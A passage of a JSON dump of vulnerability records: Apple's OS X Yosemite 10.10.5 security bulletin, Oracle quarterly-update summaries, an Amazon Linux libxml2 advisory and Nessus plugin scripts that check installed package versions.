maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. 
This issue was addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. 
These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\nan unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. 
This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. 
The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. 
This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. 
These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump versions prior\r\nto 4.7.3, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. 
This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", 
"CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", "CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-6599", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2014-0114", "CVE-2015-0364", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", 
"CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "description": "Over 150 vulnerabilities in different applications are closed in a quarterly update.", "edition": 1, "modified": "2015-01-25T00:00:00", "published": "2015-01-25T00:00:00", "id": "SECURITYVULNS:VULN:14233", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14233", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "**Issue Overview:**\n\nIt was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substitution in the doctype prolog, even if the application using libxml2 disabled any entity substitution. 
A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.\n\n \n**Affected Packages:** \n\n\nlibxml2\n\n \n**Issue Correction:** \nRun _yum update libxml2_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n libxml2-debuginfo-2.9.1-1.1.30.amzn1.i686 \n libxml2-python-2.9.1-1.1.30.amzn1.i686 \n libxml2-2.9.1-1.1.30.amzn1.i686 \n libxml2-devel-2.9.1-1.1.30.amzn1.i686 \n libxml2-static-2.9.1-1.1.30.amzn1.i686 \n \n src: \n libxml2-2.9.1-1.1.30.amzn1.src \n \n x86_64: \n libxml2-debuginfo-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-devel-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-static-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-python-2.9.1-1.1.30.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-05-21T10:31:00", "published": "2014-05-21T10:31:00", "id": "ALAS-2014-341", "href": "https://alas.aws.amazon.com/ALAS-2014-341.html", "title": "Medium: libxml2", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-17T12:49:52", "description": "From Red Hat Security Advisory 2015:0749 :\n\nUpdated libxml2 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. 
A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. (CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red\nHat.\n\nAll libxml2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.", "edition": 24, "published": "2015-03-31T00:00:00", "title": "Oracle Linux 7 : libxml2 (ELSA-2015-0749)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-03-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:libxml2-python", "p-cpe:/a:oracle:linux:libxml2-static", "p-cpe:/a:oracle:linux:libxml2-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:libxml2"], "id": "ORACLELINUX_ELSA-2015-0749.NASL", "href": "https://www.tenable.com/plugins/nessus/82464", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0749 and \n# Oracle Linux Security Advisory ELSA-2015-0749 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82464);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233, 70644);\n script_xref(name:\"RHSA\", value:\"2015:0749\");\n\n script_name(english:\"Oracle Linux 7 : libxml2 (ELSA-2015-0749)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0749 :\n\nUpdated libxml2 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. (CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red\nHat.\n\nAll libxml2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-March/004955.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-2.9.1-5.0.1.el7_1.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-devel-2.9.1-5.0.1.el7_1.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-python-2.9.1-5.0.1.el7_1.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-static-2.9.1-5.0.1.el7_1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-devel / libxml2-python / libxml2-static\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:12:27", "description": "Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2015-01-02T00:00:00", "title": "Fedora 20 : mingw-libxml2-2.9.2-1.fc20 (2014-17573)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-01-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mingw-libxml2", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-17573.NASL", "href": "https://www.tenable.com/plugins/nessus/80318", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17573.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80318);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"FEDORA\", value:\"2014-17573\");\n\n script_name(english:\"Fedora 20 : mingw-libxml2-2.9.2-1.fc20 (2014-17573)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the 
